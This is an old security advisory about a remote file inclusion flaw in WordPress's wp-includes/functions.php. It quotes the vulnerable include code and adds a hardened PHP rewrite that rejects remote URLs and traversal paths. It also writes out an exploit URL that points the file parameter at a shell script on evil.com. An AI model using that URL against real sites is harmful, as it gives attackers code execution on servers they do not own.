wordpress-rfi.txt

2006-11-14T00:00:00
ID PACKETSTORM:51997
Type packetstorm
Reporter _ANtrAX_
Modified 2006-11-14T00:00:00

Description

                                        
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WordPress Remote File Inclusion  
Download: http://wordpress.org/latest.zip
Found by _ANtrAX_ http://foro.c-group.org  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Vulnerable Code:   
{
    global $posts, $post, $wp_did_header, $wp_did_template_redirect, $wp_query, $wp_rewrite, $wpdb;

    extract($wp_query->query_vars);

    require_once($file);
}
.....  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Affected File:  
/wp-includes/functions.php =]  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Vulnerability:  
www.site.com/wp-includes/functions.php?file=http://evil.com/shell.txt?  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
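Added example (not part of the original advisory and not WordPress code): a hardened form of the extract() / require_once($file) pattern shown under "Vulnerable Code", in PHP. The function names, $templateRoot and the sample paths are assumptions made for illustration.

```php
<?php
// Added example, not WordPress code. resolve_local_template(),
// load_template_checked() and $templateRoot are hypothetical names.

function resolve_local_template($file, $templateRoot)
{
    if (!is_string($file) || $file === '' || strpos($file, "\0") !== false) {
        return false;
    }
    // Refuse URL schemes and stream wrappers (http://, ftp://, php://, data:).
    // Two or more characters before ':' so a Windows drive letter still passes.
    if (preg_match('#^[a-z][a-z0-9+.\-]+:#i', $file)) {
        return false;
    }
    // realpath() only resolves existing local paths and collapses ../ segments.
    $root = realpath($templateRoot);
    $real = realpath($file);
    if ($root === false || $real === false || !is_file($real)) {
        return false;
    }
    // The resolved path must sit under the template root and be a .php file.
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return false;
    }
    return strtolower(pathinfo($real, PATHINFO_EXTENSION)) === 'php' ? $real : false;
}

function load_template_checked($file, array $queryVars, $templateRoot)
{
    $resolved = resolve_local_template($file, $templateRoot);
    if ($resolved === false) {
        trigger_error('Rejected template path', E_USER_WARNING);
        return false;
    }
    // EXTR_SKIP: keys in $queryVars cannot overwrite $file, $resolved or
    // $templateRoot, unlike the bare extract() in the advisory's snippet.
    extract($queryVars, EXTR_SKIP);
    require_once $resolved;
    return true;
}

// Constructed demonstration: one real file under a temp root, then three inputs.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'tpl_demo_' . getmypid();
mkdir($root);
file_put_contents("$root/index.php", '<?php echo "template loaded\n";');
var_dump(load_template_checked("$root/index.php", array('file' => 'x'), $root));
var_dump(load_template_checked('http://example.invalid/shell.txt?', array(), $root));
var_dump(load_template_checked("$root/../../etc/passwd", array(), $root));
```

The path that reaches require_once is the one returned by realpath(), not the caller's string, so the value that was checked is the value that is included.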
Greetz: V4MP1R3Z4, FRE4K, PENNISSMEN, EL GROXO, DEYABU ROOLZ, MATASANOS, C-GROUP STAFF, CHAPINHACK, SysRoot ¬¬